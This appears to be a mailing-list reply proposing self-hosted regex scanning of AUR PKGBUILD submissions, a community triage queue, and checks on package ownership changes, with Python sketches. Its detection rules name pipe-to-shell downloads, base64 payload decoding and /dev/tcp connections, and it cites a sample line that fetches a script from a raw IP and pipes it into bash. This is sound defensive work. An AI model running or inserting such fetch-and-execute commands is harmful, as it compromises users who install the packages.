On 5/29/26 2:56 AM, [email protected] wrote:
> Pretty good idea you got there; however, there's a legitimate concern
> about where and how you are going to run it.
> For instance, which model would we use? Gemini? DeepSeek? Open-sourced
> ChatGPT?
> Secondly, where are we gonna get the money for that? Donations have
> covered everything up to this point, but running an LLM will send costs
> through the roof.
>
> I suggest either distilling or training a separate, specialized model
> (**NOT** a language model) to keep costs low: it won't be a generalist,
> so we won't be wasting RAM storing parameters about medicine in a
> software project.

That's a really good idea, and those are practical concerns. But since
PKGBUILD files are just bash scripts, and we could probably suss out a
fairly rigorous scanning process given the brain trust on this list, it
may not require a frontier-model LLM or its cost.

Why not come up with a set of criteria and turn those into sed, awk,
etc. tests that catch suspicious submissions? Those tests could simply be
self-hosted and run for each new account/submission. All an LLM is going
to do (give or take) is take prompts telling it to put those checks
together and then run them. Some prompt wizard could ask the models to
generate an efficient set of scripts to test the criteria and see what
they spit out.
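As a rough illustration of turning criteria into tests, here is a minimal sketch that uses Python's `re` module in place of sed/awk so each rule is easy to unit-test. The rule names, the patterns in `RULES`, and the `scan_pkgbuild` helper are hypothetical examples, not criteria taken from any postmortem. A line-based scan like this is also easy to evade (line continuations, variable indirection), so treat it as a first-pass filter that feeds human triage, not a verdict.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    line: str


# Hypothetical example criteria; a real list would come out of the postmortem.
RULES = {
    # curl/wget output piped straight into a shell
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    # decoding an embedded base64 payload
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b"),
    # eval of dynamically built strings
    "eval": re.compile(r"\beval\b"),
    # bash's /dev/tcp and /dev/udp network pseudo-devices
    "dev-tcp": re.compile(r"/dev/(tcp|udp)/"),
    # downloads from a bare IPv4 address instead of a hostname
    "raw-ip-url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
}


def scan_pkgbuild(text: str) -> List[Finding]:
    """Return one Finding per (rule, line) match; full-line comments are skipped."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings
```

Run against a sample PKGBUILD whose `prepare()` function contains `curl -s http://10.0.0.5/x | bash` on line 6, this reports both `pipe-to-shell` and `raw-ip-url` for line 6, while a commented-out `curl ... | sh` line is ignored. Each rule stays a one-line regex, so adding a criterion from the postmortem means adding one dictionary entry plus a test case.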

A self-hosted tool that scales and is 95% as good as an LLM at zero
cost seems like the best of both worlds.

The second part of that is moderator or trusted-user triage of any
positives the scan identifies. That has to scale as well (hopefully not
too much), but we don't want to pull the moderators away from the job
they already do. Putting that out to the community in a Stack Overflow
"Queues"-style format may be one way to get members involved, and the
queue could be opened to users with X years/months of membership without
a lot of trouble.
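A minimal sketch of the queue idea, assuming each flagged submission carries a count of rule hits and that eligibility is gated purely on account age. `MIN_ACCOUNT_AGE` stands in for the undecided "X years/months", and `Reviewer`, `ReviewQueue`, and `pop_for` are hypothetical names; this does not model how Stack Overflow's review queues actually work.

```python
import heapq
import itertools
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Hypothetical placeholder for "X number of years/months"; not a decided value.
MIN_ACCOUNT_AGE = timedelta(days=365)


@dataclass(frozen=True)
class Reviewer:
    name: str
    registered: datetime


def is_eligible(reviewer: Reviewer, now: datetime) -> bool:
    """A reviewer may take queue items once their account is old enough."""
    return now - reviewer.registered >= MIN_ACCOUNT_AGE


class ReviewQueue:
    """Flagged packages, most rule hits first, first-come first-served on ties."""

    def __init__(self) -> None:
        self._heap: List[Tuple[int, int, str]] = []
        self._counter = itertools.count()

    def push(self, package: str, finding_count: int) -> None:
        # heapq is a min-heap, so negate the count to pop the most-flagged first;
        # the monotonically increasing counter breaks ties in insertion order.
        heapq.heappush(self._heap, (-finding_count, next(self._counter), package))

    def pop_for(self, reviewer: Reviewer, now: datetime) -> Optional[str]:
        """Hand the next package to an eligible reviewer, else return None."""
        if not is_eligible(reviewer, now) or not self._heap:
            return None
        return heapq.heappop(self._heap)[2]
```

For example, with `now = datetime(2026, 5, 29)`, a reviewer registered on 2026-05-01 gets `None` from `pop_for`, while one registered in 2020 receives packages in order of most findings first, with ties served in the order they were flagged.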

I don't mind helping from either the queue or the tooling side, but what
we need to do first is start gathering the criteria that need to be
checked, starting with the postmortem from the recent attempts. I don't
know how the checks would be integrated to run at the AUR level, but I
can help turn criteria into testable script fragments.

Something similar could be done for AUR account and package ownership
changes, adoptions, etc.
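The same approach could be sketched for ownership changes. This assumes a hypothetical feed of `OwnershipEvent` records (package, new owner, the owner's registration date, time of change); the thresholds `NEW_ACCOUNT_AGE`, `CHURN_WINDOW`, and `CHURN_LIMIT` are illustrative placeholders, not existing AUR policy. It flags adoptions by very new accounts and packages that change hands repeatedly within a short window.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Hypothetical thresholds, for illustration only.
NEW_ACCOUNT_AGE = timedelta(days=30)  # owner account younger than this is "new"
CHURN_WINDOW = timedelta(days=90)     # look-back window for repeated changes
CHURN_LIMIT = 2                       # prior changes in the window before flagging


@dataclass(frozen=True)
class OwnershipEvent:
    package: str
    new_owner: str
    owner_registered: datetime
    when: datetime


def flag_events(events: List[OwnershipEvent]) -> List[Tuple[str, str]]:
    """Return (package, reason) pairs for ownership changes worth a human look."""
    flags: List[Tuple[str, str]] = []
    history: Dict[str, List[datetime]] = {}
    # Process in time order so the churn check only ever looks backward.
    for ev in sorted(events, key=lambda e: e.when):
        if ev.when - ev.owner_registered < NEW_ACCOUNT_AGE:
            flags.append((ev.package, "adopted by new account"))
        earlier = history.get(ev.package, [])
        recent = [t for t in earlier if ev.when - t <= CHURN_WINDOW]
        # Flag when this change follows CHURN_LIMIT or more changes in the window.
        if len(recent) >= CHURN_LIMIT:
            flags.append((ev.package, "frequent ownership changes"))
        history.setdefault(ev.package, []).append(ev.when)
    return flags
```

Because events are handled in time order and only earlier changes are consulted, the same function works on a historical dump or on a live stream of adoption events.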

Focusing on the actual package problem and eliminating the
account-identity baggage is a good idea, and a homegrown solution is
never a bad choice.
--
David C. Rankin, J.D.,P.E.